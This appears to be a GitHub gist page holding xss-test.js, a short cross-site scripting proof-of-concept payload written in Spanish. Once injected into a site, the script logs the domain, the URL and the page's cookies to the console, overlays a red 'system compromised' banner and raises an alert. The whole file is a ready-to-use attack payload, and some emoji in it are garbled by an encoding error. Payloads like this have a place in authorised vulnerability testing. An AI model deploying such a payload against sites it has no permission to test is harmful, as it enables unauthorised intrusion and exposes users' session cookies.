Skip to content

Instantly share code, notes, and snippets.

View VictorDom777's full-sized avatar

KUMA VictorDom777

View GitHub Profile
@VictorDom777
VictorDom777 / xss-test.js
Last active October 2, 2025 08:09
xss-test.js
console.log("🚨 XSS EJECUTADO EXITOSAMENTE!");
console.log("🎯 Dominio comprometido:", window.location.hostname);
var div = document.createElement("div");
div.style.cssText =
"position:fixed;top:0;left:0;width:100%;background:red;color:white;padding:10px;z-index:9999;text-align:center;font-size:16px;";
div.innerHTML = "🚨 XSS CONFIRMADO - SISTEMA COMPROMETIDO 🚨";
document.body.appendChild(div);
console.log("πŸ“Š URL:", window.location.href);
console.log("πŸ“Š Cookies:", document.cookie);
alert("XSS CONFIRMADO en: " + window.location.hostname);